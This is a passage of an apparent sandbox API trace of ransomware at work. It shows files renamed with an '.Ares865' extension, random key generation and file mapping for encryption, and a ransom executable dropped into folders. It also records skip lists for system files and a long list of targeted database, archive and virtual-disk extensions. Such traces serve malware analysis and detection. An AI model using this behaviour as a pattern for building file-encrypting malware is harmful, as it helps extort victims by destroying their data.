(lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\logo.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\logo.png.ares865"), dwFlags=0x1) returned 1 [0115.320] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\logo.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0115.324] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5930) returned 1 [0115.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0115.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0115.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0115.331] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0115.350] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0115.351] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.358] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1a30, lpName=0x0) returned 0x170 [0115.368] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a30) returned 0x190000 [0115.371] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0115.386] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0115.386] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0115.392] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0115.392] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0115.393] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0115.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0115.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0115.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0115.397] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0115.402] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0115.403] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0115.404] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0115.406] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0115.408] CloseHandle (hObject=0x170) returned 1 [0115.409] CloseHandle (hObject=0x118) returned 1 [0115.410] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0115.410] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0115.411] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0115.415] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf13d2d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcf13d2d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbf1ad59c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x172a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0115.416] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0115.417] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a90 [0115.417] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images" [0115.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fc8 | out: hHeap=0x2b0000) returned 1 [0115.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0115.419] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images") returned 68 [0115.420] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images" | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images" [0115.421] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0115.423] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\how to back your files.exe"), bFailIfExists=1) returned 0 [0115.434] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0115.439] GetLastError () returned 0x0 [0115.440] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0115.442] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0115.443] CloseHandle (hObject=0x120) returned 1 [0115.445] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0115.445] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0115.446] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51d17d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51d17d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0115.450] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.452] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0115.453] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0115.453] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x51d17d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x51d17d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0115.455] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.456] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0115.457] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0115.457] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0115.459] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd699b5c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xbd699b5c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xbd699b5c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1456, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1.png", cAlternateFileName="")) returned 1 [0115.459] lstrcmpiW (lpString1="1.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0115.461] lstrcmpiW (lpString1="1.png", lpString2="aoldtz.exe") returned -1 [0115.461] lstrcmpiW (lpString1="1.png", lpString2=".") returned 1 [0115.462] lstrcmpiW (lpString1="1.png", lpString2="..") returned 1 [0115.462] lstrcmpiW (lpString1="1.png", lpString2="windows") returned -1 [0115.462] lstrcmpiW (lpString1="1.png", lpString2="bootmgr") returned -1 [0115.463] lstrcmpiW (lpString1="1.png", lpString2="temp") returned -1 [0115.464] lstrcmpiW (lpString1="1.png", lpString2="pagefile.sys") returned -1 [0115.465] lstrcmpiW (lpString1="1.png", lpString2="boot") returned -1 [0115.465] lstrcmpiW (lpString1="1.png", lpString2="ids.txt") returned -1 [0115.467] lstrcmpiW (lpString1="1.png", lpString2="ntuser.dat") returned -1 [0115.467] lstrcmpiW (lpString1="1.png", lpString2="perflogs") returned -1 [0115.467] lstrcmpiW (lpString1="1.png", lpString2="MSBuild") returned -1 [0115.469] lstrlenW (lpString="1.png") returned 5 [0115.470] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*") returned 70 [0115.471] lstrcpyW (in: lpString1=0x2cce48a, lpString2="1.png" | out: lpString1="1.png") returned="1.png" [0115.472] lstrlenW (lpString="1.png") returned 5 [0115.473] lstrlenW (lpString="Ares865") returned 7 [0115.473] lstrlenW (lpString=".dll") returned 4 [0115.475] lstrcmpiW (lpString1="1.png", lpString2=".dll") returned 1 [0115.477] lstrlenW (lpString=".lnk") returned 4 [0115.478] lstrcmpiW (lpString1="1.png", lpString2=".lnk") returned 1 [0115.479] lstrlenW (lpString=".ini") returned 4 [0115.480] lstrcmpiW (lpString1="1.png", lpString2=".ini") returned 1 [0115.481] lstrlenW (lpString=".sys") returned 4 [0115.481] lstrcmpiW (lpString1="1.png", lpString2=".sys") returned 1 [0115.483] lstrlenW (lpString="1.png") returned 5 [0115.485] lstrlenW (lpString="bak") returned 3 [0115.486] lstrcmpiW (lpString1="png", lpString2="bak") returned 1 [0115.486] lstrlenW (lpString="ba_") returned 3 [0115.487] lstrcmpiW (lpString1="png", lpString2="ba_") returned 1 [0115.488] lstrlenW (lpString="dbb") returned 3 [0115.488] lstrcmpiW (lpString1="png", lpString2="dbb") returned 1 [0115.488] lstrlenW (lpString="vmdk") returned 4 [0115.488] lstrcmpiW (lpString1=".png", lpString2="vmdk") returned -1 [0115.488] lstrlenW (lpString="rar") returned 3 [0115.488] lstrcmpiW (lpString1="png", lpString2="rar") returned -1 [0115.488] lstrlenW (lpString="zip") returned 3 [0115.488] lstrcmpiW (lpString1="png", lpString2="zip") returned -1 [0115.488] lstrlenW (lpString="tgz") returned 3 [0115.488] lstrcmpiW (lpString1="png", lpString2="tgz") returned -1 [0115.488] lstrlenW (lpString="vbox") returned 4 [0115.488] lstrcmpiW (lpString1=".png", lpString2="vbox") returned -1 [0115.488] lstrlenW (lpString="vdi") returned 3 [0115.489] lstrcmpiW (lpString1="png", lpString2="vdi") returned -1 [0115.489] lstrlenW (lpString="vhd") returned 3 [0115.489] lstrcmpiW (lpString1="png", lpString2="vhd") returned -1 [0115.489] lstrlenW (lpString="vhdx") returned 4 [0115.489] lstrcmpiW (lpString1=".png", lpString2="vhdx") returned -1 [0115.489] lstrlenW (lpString="avhd") returned 4 [0115.489] lstrcmpiW (lpString1=".png", lpString2="avhd") returned -1 [0115.489] lstrlenW (lpString="db") returned 2 [0115.489] lstrcmpiW (lpString1="ng", lpString2="db") returned 1 [0115.489] lstrlenW (lpString="db2") returned 3 [0115.489] lstrcmpiW (lpString1="png", lpString2="db2") returned 1 [0115.489] lstrlenW (lpString="db3") returned 3 [0115.489] lstrcmpiW (lpString1="png", lpString2="db3") returned 1 [0115.489] lstrlenW (lpString="dbf") returned 3 [0115.489] lstrcmpiW (lpString1="png", lpString2="dbf") returned 1 [0115.489] lstrlenW (lpString="mdf") returned 3 [0115.489] lstrcmpiW (lpString1="png", lpString2="mdf") returned 1 [0115.489] lstrlenW (lpString="mdb") returned 3 [0115.489] lstrcmpiW (lpString1="png", lpString2="mdb") returned 1 [0115.489] lstrlenW (lpString="sql") returned 3 [0115.489] lstrcmpiW (lpString1="png", lpString2="sql") returned -1 [0115.489] lstrlenW (lpString="sqlite") returned 6 [0115.489] lstrlenW (lpString="sqlite3") returned 7 [0115.489] lstrlenW (lpString="sqlitedb") returned 8 [0115.489] lstrlenW (lpString="xml") returned 3 [0115.489] lstrcmpiW (lpString1="png", lpString2="xml") returned -1 [0115.489] lstrlenW (lpString="$er") returned 3 [0115.489] lstrcmpiW (lpString1="png", lpString2="$er") returned 1 [0115.489] lstrlenW (lpString="4dd") returned 3 [0115.489] lstrcmpiW (lpString1="png", lpString2="4dd") returned 1 [0115.489] lstrlenW (lpString="4dl") returned 3 [0115.489] lstrcmpiW (lpString1="png", lpString2="4dl") returned 1 [0115.489] lstrlenW (lpString="^^^") returned 3 [0115.489] lstrcmpiW (lpString1="png", lpString2="^^^") returned 1 [0115.490] lstrlenW (lpString="abs") returned 3 [0115.490] lstrcmpiW (lpString1="png", lpString2="abs") returned 1 [0115.490] lstrlenW (lpString="abx") returned 3 [0115.490] lstrcmpiW (lpString1="png", lpString2="abx") returned 1 [0115.490] lstrlenW (lpString="accdb") returned 5 [0115.490] lstrlenW (lpString="accdc") returned 5 [0115.490] lstrlenW (lpString="accde") returned 5 [0115.490] lstrlenW (lpString="accdr") returned 5 [0115.490] lstrlenW (lpString="accdt") returned 5 [0115.490] lstrlenW (lpString="accdw") returned 5 [0115.490] lstrlenW (lpString="accft") returned 5 [0115.490] lstrlenW (lpString="adb") returned 3 [0115.490] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0115.490] lstrlenW (lpString="adb") returned 3 [0115.490] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0115.490] lstrlenW (lpString="ade") returned 3 [0115.490] lstrcmpiW (lpString1="png", lpString2="ade") returned 1 [0115.490] lstrlenW (lpString="adf") returned 3 [0115.490] lstrcmpiW (lpString1="png", lpString2="adf") returned 1 [0115.490] lstrlenW (lpString="adn") returned 3 [0115.490] lstrcmpiW (lpString1="png", lpString2="adn") returned 1 [0115.490] lstrlenW (lpString="adp") returned 3 [0115.490] lstrcmpiW (lpString1="png", lpString2="adp") returned 1 [0115.490] lstrlenW (lpString="alf") returned 3 [0115.490] lstrcmpiW (lpString1="png", lpString2="alf") returned 1 [0115.490] lstrlenW (lpString="ask") returned 3 [0115.490] lstrcmpiW (lpString1="png", lpString2="ask") returned 1 [0115.490] lstrlenW (lpString="btr") returned 3 [0115.490] lstrcmpiW (lpString1="png", lpString2="btr") returned 1 [0115.490] lstrlenW (lpString="cat") returned 3 [0115.490] lstrcmpiW (lpString1="png", lpString2="cat") returned 1 [0115.490] lstrlenW (lpString="cdb") returned 3 [0115.490] lstrcmpiW (lpString1="png", lpString2="cdb") returned 1 [0115.490] lstrlenW (lpString="ckp") returned 3 [0115.491] lstrcmpiW (lpString1="png", lpString2="ckp") returned 1 [0115.491] lstrlenW (lpString="cma") returned 3 [0115.491] lstrcmpiW (lpString1="png", lpString2="cma") returned 1 [0115.491] lstrlenW (lpString="cpd") returned 3 [0115.491] lstrcmpiW (lpString1="png", lpString2="cpd") returned 1 [0115.491] lstrlenW (lpString="dacpac") returned 6 [0115.491] lstrlenW (lpString="dad") returned 3 [0115.491] lstrcmpiW (lpString1="png", lpString2="dad") returned 1 [0115.491] lstrlenW (lpString="dadiagrams") returned 10 [0115.491] lstrlenW (lpString="daschema") returned 8 [0115.491] lstrlenW (lpString="db-journal") returned 10 [0115.491] lstrlenW (lpString="db-shm") returned 6 [0115.491] lstrlenW (lpString="db-wal") returned 6 [0115.491] lstrlenW (lpString="dbc") returned 3 [0115.491] lstrcmpiW (lpString1="png", lpString2="dbc") returned 1 [0115.491] lstrlenW (lpString="dbs") returned 3 [0115.491] lstrcmpiW (lpString1="png", lpString2="dbs") returned 1 [0115.491] lstrlenW (lpString="dbt") returned 3 [0115.491] lstrcmpiW (lpString1="png", lpString2="dbt") returned 1 [0115.491] lstrlenW (lpString="dbv") returned 3 [0115.491] lstrcmpiW (lpString1="png", lpString2="dbv") returned 1 [0115.491] lstrlenW (lpString="dbx") returned 3 [0115.491] lstrcmpiW (lpString1="png", lpString2="dbx") returned 1 [0115.491] lstrlenW (lpString="dcb") returned 3 [0115.491] lstrcmpiW (lpString1="png", lpString2="dcb") returned 1 [0115.491] lstrlenW (lpString="dct") returned 3 [0115.491] lstrcmpiW (lpString1="png", lpString2="dct") returned 1 [0115.491] lstrlenW (lpString="dcx") returned 3 [0115.491] lstrcmpiW (lpString1="png", lpString2="dcx") returned 1 [0115.491] lstrlenW (lpString="ddl") returned 3 [0115.491] lstrcmpiW (lpString1="png", lpString2="ddl") returned 1 [0115.491] lstrlenW (lpString="dlis") returned 4 [0115.491] lstrcmpiW (lpString1=".png", lpString2="dlis") returned -1 [0115.491] lstrlenW (lpString="dp1") returned 3 [0115.492] lstrcmpiW (lpString1="png", lpString2="dp1") returned 1 [0115.492] lstrlenW (lpString="dqy") returned 3 [0115.492] lstrcmpiW (lpString1="png", lpString2="dqy") returned 1 [0115.492] lstrlenW (lpString="dsk") returned 3 [0115.492] lstrcmpiW (lpString1="png", lpString2="dsk") returned 1 [0115.492] lstrlenW (lpString="dsn") returned 3 [0115.492] lstrcmpiW (lpString1="png", lpString2="dsn") returned 1 [0115.492] lstrlenW (lpString="dtsx") returned 4 [0115.492] lstrcmpiW (lpString1=".png", lpString2="dtsx") returned -1 [0115.492] lstrlenW (lpString="dxl") returned 3 [0115.492] lstrcmpiW (lpString1="png", lpString2="dxl") returned 1 [0115.492] lstrlenW (lpString="eco") returned 3 [0115.492] lstrcmpiW (lpString1="png", lpString2="eco") returned 1 [0115.492] lstrlenW (lpString="ecx") returned 3 [0115.492] lstrcmpiW (lpString1="png", lpString2="ecx") returned 1 [0115.492] lstrlenW (lpString="edb") returned 3 [0115.492] lstrcmpiW (lpString1="png", lpString2="edb") returned 1 [0115.492] lstrlenW (lpString="epim") returned 4 [0115.492] lstrcmpiW (lpString1=".png", lpString2="epim") returned -1 [0115.492] lstrlenW (lpString="fcd") returned 3 [0115.492] lstrcmpiW (lpString1="png", lpString2="fcd") returned 1 [0115.492] lstrlenW (lpString="fdb") returned 3 [0115.492] lstrcmpiW (lpString1="png", lpString2="fdb") returned 1 [0115.492] lstrlenW (lpString="fic") returned 3 [0115.492] lstrcmpiW (lpString1="png", lpString2="fic") returned 1 [0115.492] lstrlenW (lpString="flexolibrary") returned 12 [0115.492] lstrlenW (lpString="fm5") returned 3 [0115.492] lstrcmpiW (lpString1="png", lpString2="fm5") returned 1 [0115.492] lstrlenW (lpString="fmp") returned 3 [0115.492] lstrcmpiW (lpString1="png", lpString2="fmp") returned 1 [0115.492] lstrlenW (lpString="fmp12") returned 5 [0115.492] lstrlenW (lpString="fmpsl") returned 5 [0115.492] lstrlenW (lpString="fol") returned 3 [0115.492] lstrcmpiW (lpString1="png", lpString2="fol") returned 1 [0115.492] lstrlenW (lpString="fp3") returned 3 [0115.493] lstrcmpiW (lpString1="png", lpString2="fp3") returned 1 [0115.493] lstrlenW (lpString="fp4") returned 3 [0115.493] lstrcmpiW (lpString1="png", lpString2="fp4") returned 1 [0115.493] lstrlenW (lpString="fp5") returned 3 [0115.493] lstrcmpiW (lpString1="png", lpString2="fp5") returned 1 [0115.493] lstrlenW (lpString="fp7") returned 3 [0115.493] lstrcmpiW (lpString1="png", lpString2="fp7") returned 1 [0115.493] lstrlenW (lpString="fpt") returned 3 [0115.493] lstrcmpiW (lpString1="png", lpString2="fpt") returned 1 [0115.493] lstrlenW (lpString="frm") returned 3 [0115.493] lstrcmpiW (lpString1="png", lpString2="frm") returned 1 [0115.493] lstrlenW (lpString="gdb") returned 3 [0115.493] lstrcmpiW (lpString1="png", lpString2="gdb") returned 1 [0115.493] lstrlenW (lpString="gdb") returned 3 [0115.493] lstrcmpiW (lpString1="png", lpString2="gdb") returned 1 [0115.493] lstrlenW (lpString="grdb") returned 4 [0115.493] lstrcmpiW (lpString1=".png", lpString2="grdb") returned -1 [0115.493] lstrlenW (lpString="gwi") returned 3 [0115.493] lstrcmpiW (lpString1="png", lpString2="gwi") returned 1 [0115.493] lstrlenW (lpString="hdb") returned 3 [0115.493] lstrcmpiW (lpString1="png", lpString2="hdb") returned 1 [0115.493] lstrlenW (lpString="his") returned 3 [0115.493] lstrcmpiW (lpString1="png", lpString2="his") returned 1 [0115.493] lstrlenW (lpString="ib") returned 2 [0115.493] lstrcmpiW (lpString1="ng", lpString2="ib") returned 1 [0115.493] lstrlenW (lpString="idb") returned 3 [0115.493] lstrcmpiW (lpString1="png", lpString2="idb") returned 1 [0115.493] lstrlenW (lpString="ihx") returned 3 [0115.493] lstrcmpiW (lpString1="png", lpString2="ihx") returned 1 [0115.493] lstrlenW (lpString="itdb") returned 4 [0115.493] lstrcmpiW (lpString1=".png", lpString2="itdb") returned -1 [0115.493] lstrlenW (lpString="itw") returned 3 [0115.493] lstrcmpiW (lpString1="png", lpString2="itw") returned 1 [0115.493] lstrlenW (lpString="jet") returned 3 [0115.493] lstrcmpiW (lpString1="png", lpString2="jet") returned 1 [0115.493] lstrlenW (lpString="jtx") returned 3 [0115.494] lstrcmpiW (lpString1="png", lpString2="jtx") returned 1 [0115.494] lstrlenW (lpString="kdb") returned 3 [0115.494] lstrcmpiW (lpString1="png", lpString2="kdb") returned 1 [0115.494] lstrlenW (lpString="kexi") returned 4 [0115.494] lstrcmpiW (lpString1=".png", lpString2="kexi") returned -1 [0115.494] lstrlenW (lpString="kexic") returned 5 [0115.494] lstrlenW (lpString="kexis") returned 5 [0115.494] lstrlenW (lpString="lgc") returned 3 [0115.494] lstrcmpiW (lpString1="png", lpString2="lgc") returned 1 [0115.494] lstrlenW (lpString="lwx") returned 3 [0115.494] lstrcmpiW (lpString1="png", lpString2="lwx") returned 1 [0115.494] lstrlenW (lpString="maf") returned 3 [0115.494] lstrcmpiW (lpString1="png", lpString2="maf") returned 1 [0115.494] lstrlenW (lpString="maq") returned 3 [0115.494] lstrcmpiW (lpString1="png", lpString2="maq") returned 1 [0115.494] lstrlenW (lpString="mar") returned 3 [0115.494] lstrcmpiW (lpString1="png", lpString2="mar") returned 1 [0115.494] lstrlenW (lpString="marshal") returned 7 [0115.494] lstrlenW (lpString="mas") returned 3 [0115.494] lstrcmpiW (lpString1="png", lpString2="mas") returned 1 [0115.494] lstrlenW (lpString="mav") returned 3 [0115.494] lstrcmpiW (lpString1="png", lpString2="mav") returned 1 [0115.494] lstrlenW (lpString="maw") returned 3 [0115.494] lstrcmpiW (lpString1="png", lpString2="maw") returned 1 [0115.494] lstrlenW (lpString="mdbhtml") returned 7 [0115.494] lstrlenW (lpString="mdn") returned 3 [0115.494] lstrcmpiW (lpString1="png", lpString2="mdn") returned 1 [0115.494] lstrlenW (lpString="mdt") returned 3 [0115.494] lstrcmpiW (lpString1="png", lpString2="mdt") returned 1 [0115.494] lstrlenW (lpString="mfd") returned 3 [0115.494] lstrcmpiW (lpString1="png", lpString2="mfd") returned 1 [0115.494] lstrlenW (lpString="mpd") returned 3 [0115.494] lstrcmpiW (lpString1="png", lpString2="mpd") returned 1 [0115.494] lstrlenW (lpString="mrg") returned 3 [0115.494] lstrcmpiW (lpString1="png", lpString2="mrg") returned 1 [0115.495] lstrlenW (lpString="mud") returned 3 [0115.495] lstrcmpiW (lpString1="png", lpString2="mud") returned 1 [0115.495] lstrlenW (lpString="mwb") returned 3 [0115.495] lstrcmpiW (lpString1="png", lpString2="mwb") returned 1 [0115.495] lstrlenW (lpString="myd") returned 3 [0115.495] lstrcmpiW (lpString1="png", lpString2="myd") returned 1 [0115.495] lstrlenW (lpString="ndf") returned 3 [0115.495] lstrcmpiW (lpString1="png", lpString2="ndf") returned 1 [0115.495] lstrlenW (lpString="nnt") returned 3 [0115.495] lstrcmpiW (lpString1="png", lpString2="nnt") returned 1 [0115.495] lstrlenW (lpString="nrmlib") returned 6 [0115.495] lstrlenW (lpString="ns2") returned 3 [0115.495] lstrcmpiW (lpString1="png", lpString2="ns2") returned 1 [0115.495] lstrlenW (lpString="ns3") returned 3 [0115.495] lstrcmpiW (lpString1="png", lpString2="ns3") returned 1 [0115.495] lstrlenW (lpString="ns4") returned 3 [0115.495] lstrcmpiW (lpString1="png", lpString2="ns4") returned 1 [0115.495] lstrlenW (lpString="nsf") returned 3 [0115.495] lstrcmpiW (lpString1="png", lpString2="nsf") returned 1 [0115.495] lstrlenW (lpString="nv") returned 2 [0115.495] lstrcmpiW (lpString1="ng", lpString2="nv") returned -1 [0115.495] lstrlenW (lpString="nv2") returned 3 [0115.495] lstrcmpiW (lpString1="png", lpString2="nv2") returned 1 [0115.495] lstrlenW (lpString="nwdb") returned 4 [0115.495] lstrcmpiW (lpString1=".png", lpString2="nwdb") returned -1 [0115.495] lstrlenW (lpString="nyf") returned 3 [0115.495] lstrcmpiW (lpString1="png", lpString2="nyf") returned 1 [0115.495] lstrlenW (lpString="odb") returned 3 [0115.495] lstrcmpiW (lpString1="png", lpString2="odb") returned 1 [0115.495] lstrlenW (lpString="odb") returned 3 [0115.495] lstrcmpiW (lpString1="png", lpString2="odb") returned 1 [0115.495] lstrlenW (lpString="oqy") returned 3 [0115.495] lstrcmpiW (lpString1="png", lpString2="oqy") returned 1 [0115.495] lstrlenW (lpString="ora") returned 3 [0115.495] lstrcmpiW (lpString1="png", lpString2="ora") returned 1 [0115.496] lstrlenW (lpString="orx") returned 3 [0115.496] lstrcmpiW (lpString1="png", lpString2="orx") returned 1 [0115.496] lstrlenW (lpString="owc") returned 3 [0115.496] lstrcmpiW (lpString1="png", lpString2="owc") returned 1 [0115.496] lstrlenW (lpString="p96") returned 3 [0115.496] lstrcmpiW (lpString1="png", lpString2="p96") returned 1 [0115.496] lstrlenW (lpString="p97") returned 3 [0115.496] lstrcmpiW (lpString1="png", lpString2="p97") returned 1 [0115.496] lstrlenW (lpString="pan") returned 3 [0115.496] lstrcmpiW (lpString1="png", lpString2="pan") returned 1 [0115.496] lstrlenW (lpString="pdb") returned 3 [0115.496] lstrcmpiW (lpString1="png", lpString2="pdb") returned 1 [0115.496] lstrlenW (lpString="pdm") returned 3 [0115.496] lstrcmpiW (lpString1="png", lpString2="pdm") returned 1 [0115.496] lstrlenW (lpString="pnz") returned 3 [0115.496] lstrcmpiW (lpString1="png", lpString2="pnz") returned -1 [0115.496] lstrlenW (lpString="qry") returned 3 [0115.496] lstrcmpiW (lpString1="png", lpString2="qry") returned -1 [0115.496] lstrlenW (lpString="qvd") returned 3 [0115.496] lstrcmpiW (lpString1="png", lpString2="qvd") returned -1 [0115.496] lstrlenW (lpString="rbf") returned 3 [0115.496] lstrcmpiW (lpString1="png", lpString2="rbf") returned -1 [0115.496] lstrlenW (lpString="rctd") returned 4 [0115.496] lstrcmpiW (lpString1=".png", lpString2="rctd") returned -1 